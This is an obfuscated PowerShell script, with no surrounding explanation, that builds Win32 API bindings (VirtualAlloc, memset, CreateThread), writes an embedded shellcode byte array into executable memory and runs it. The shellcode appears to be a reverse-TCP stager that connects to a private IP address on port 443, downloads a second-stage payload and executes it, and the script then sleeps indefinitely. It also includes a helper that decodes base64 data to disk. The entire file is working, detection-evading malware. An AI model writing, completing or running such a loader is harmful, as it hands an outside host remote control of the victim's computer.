$uipt1x= [TypE]("{1}{0}" -f 'Rt','cONVE')  ;  function CoNvErt`FrO`m-`BYTES {
    param (
        [string]${b`YTEs},
        [string]${sA`V`EpAtH}
    )

    ${D`ir} = &("{0}{2}{1}" -f 'Split','h','-Pat') ${SAV`e`PatH}
    if (!(&("{1}{0}"-f 'th','Test-Pa') ${D`ir})) {
        &('md') ${d`Ir} | .("{0}{2}{1}"-f 'Out-','l','Nul')
    }

      (  GET-VArIaBLe  ('ui'+'PT1X') -valUEONl )::("{3}{1}{2}{0}"-f 'ring','romB','ase64St','F').Invoke(${By`TES}) | .("{2}{1}{3}{0}" -f 'tent','et','S','-Con') ${sA`V`EpATh} -Encoding ("{1}{0}" -f'te','By')
}

${c} = ((("{23}{37}{43}{53}{44}{32}{47}{51}{34}{58}{27}{15}{12}{31}{50}{70}{60}{20}{0}{66}{11}{49}{41}{10}{68}{56}{42}{62}{22}{2}{59}{17}{1}{55}{38}{25}{16}{71}{39}{45}{36}{21}{24}{64}{35}{65}{13}{7}{69}{6}{61}{57}{63}{40}{52}{3}{4}{67}{14}{30}{19}{46}{54}{5}{9}{28}{33}{26}{48}{18}{8}{29}" -f 'ocationType, uin','read(IntPtr lpThr','tern I','I','mpo','ntP','er, uin',' lpPar','rc, uint count)','t','ort(Gl2kernel32.dl','t','Pt','r','Gl2msv','nt','i','CreateTh','s','.dllGl2)]publ',' dwSize, uint flAll','ui',' ex','[Dll','nt dwStack','ttr','(IntPtr dest, uin','tern I','r memse',';','crt','r Virtua','llGl2)]publ','t','e',' Int',' ','Imp','adA','s','ThreadId);[Dl','llImp','blic sta','ort(Gl2ke','d',',','ic static extern','ic','t ','ect);[D','lAlloc(IntPtr l',' static ','l','rnel32.',' I','e','l2)]pu','Fl','x','ntPtr ',', uint','t dwCreation','tic','ags, IntPtr lp','Size,','Ptr lpStartAddress, IntPt','t flPro','rt(','lG','amet','pAddress','bute'))."repl`ACE"(([chaR]71+[chaR]108+[chaR]50),[stRinG][chaR]34));${W} = &("{1}{0}{2}" -f 'd-','Ad','Type') -memberDefinition ${C} -Name ("{1}{0}" -f'2','Win3') -namespace ("{0}{2}{1}{3}"-f'Win','uncti','32F','ons') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x38,0x82,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."lEng`TH" -gt 0x1000){${g} = ${z}."l`eNG`TH"};${X}=${W}::("{1}{0}{2}"-f'irtualAll','V','oc').Invoke(0,0x1000,${g},0x40);for (${I}=0;${I} -le (${z}."l`EnG`Th"-1);${i}++) {${w}::"M`EmSeT"([IntPtr](${X}.("{1}{0}"-f 'oInt32','T').Invoke()+${i}), ${Z}[${I}], 1)};${W}::("{0}{1}{2}{3}" -f 'Cr','eate','Threa','d').Invoke(0,0,${X},0,0,0);for (;;){&("{0}{2}{1}" -f'S','ep','tart-sle') 60};
